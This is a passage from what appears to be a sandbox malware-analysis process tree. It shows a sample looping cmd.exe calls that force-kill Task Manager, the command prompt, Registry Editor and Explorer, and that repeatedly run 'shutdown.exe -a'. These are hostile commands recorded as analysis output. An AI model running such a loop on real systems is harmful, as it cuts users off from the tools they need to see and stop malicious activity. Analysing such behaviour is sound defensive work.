        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:2232
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2428
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:1724
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:3032
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:1560
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2064
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:2516
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:1280
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        Kills process with taskkill
        
        PID:2460
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:660
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:2696
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2392
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:1152
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2924
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:528
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2852
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:1796
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:836
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:2452
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2376
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        Kills process with taskkill
        
        PID:2436
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:1984
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:2308
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:964
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:2432
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1696
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:2656
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:1416
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        Kills process with taskkill
        
        PID:1912
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2784
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:1812
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2608
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:1492
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2380
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:2188
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2144
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        Kills process with taskkill
        
        PID:2664
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2520
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:3024
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:1624
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:1532
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:1660
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:3044
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:1300
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        Kills process with taskkill
        
        PID:2708
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2928
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:2720
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2876
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:3000
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:1772
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:1596
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2628
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:1208
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2088
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:1484
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2880
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:2612
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2988
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        Kills process with taskkill
        
        PID:2556
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:1724
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:1656
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:3032
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:2292
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:1788
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:2096
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2596
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        Kills process with taskkill
        
        PID:2044
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:1764
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        Kills process with taskkill
        
        PID:936
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:1152
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:2340
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2924
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:112
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2820
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:300
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2492
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:2804
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2828
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:1480
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2308
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:1508
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:964
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:2892
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2248
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:2384
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1204
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:1460
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2112
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:1684
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:1492
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:872
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2380
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:2040
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2552
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        Kills process with taskkill
        
        PID:2864
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1536
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:880
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2844
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:2500
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:3044
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:628
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:1300
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:1520
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2648
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:2860
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2236
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:1212
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:1580
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        Kills process with taskkill
        
        PID:1976
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2980
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:2640
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2080
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:2124
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:1484
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        Kills process with taskkill
        
        PID:2992
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2880
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:2800
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2052
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:2764
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2476
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:2428
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2084
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:2532
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:1032
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:896
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1280
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:1504
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:660
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:1320
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:1604
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        Kills process with taskkill
        
        PID:2392
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2968
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:2788
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:1384
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:2960
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1972
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:336
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2376
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:1844
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:1840
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:2396
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:964
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:684
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:1540
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        Kills process with taskkill
        
        PID:1964
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1416
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        Kills process with taskkill
        
        PID:1204
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2776
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:2112
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2572
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:1492
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:1944
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:2872
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:1564
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:2864
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2576
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:1536
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2272
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        Kills process with taskkill
        
        PID:2844
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:1640
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:3044
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:1872
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:1392
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2216
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        Kills process with taskkill
        
        PID:2928
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2196
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        Kills process with taskkill
        
        PID:548
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:3040
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:1580
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2148
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:2980
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:1632
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:2684
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2612
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:1192
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1680
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:2880
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:1528
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:2052
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:1860
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:1740
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2084
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:400
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2096
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        Kills process with taskkill
        
        PID:1896
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2932
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:1280
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2356
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:2696
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2412
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:1152
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2968
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:836
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:1472
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:1796
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1884
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:2452
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:596
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:2436
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2432
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:2136
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2156
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:2056
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2656
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:1964
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1912
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:2480
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2112
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:872
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:1492
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:2188
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:1944
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:1388
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:1564
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        Kills process with taskkill
        
        PID:880
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1536
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:2500
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2844
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:628
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:3044
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:2868
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:1300
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:3000
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:1556
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:1212
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:548
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        Kills process with taskkill
        
        PID:1976
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:1580
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:2640
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2980
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:2080
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2620
      - C:\Windows\SysWOW64\shutdown.exe
        
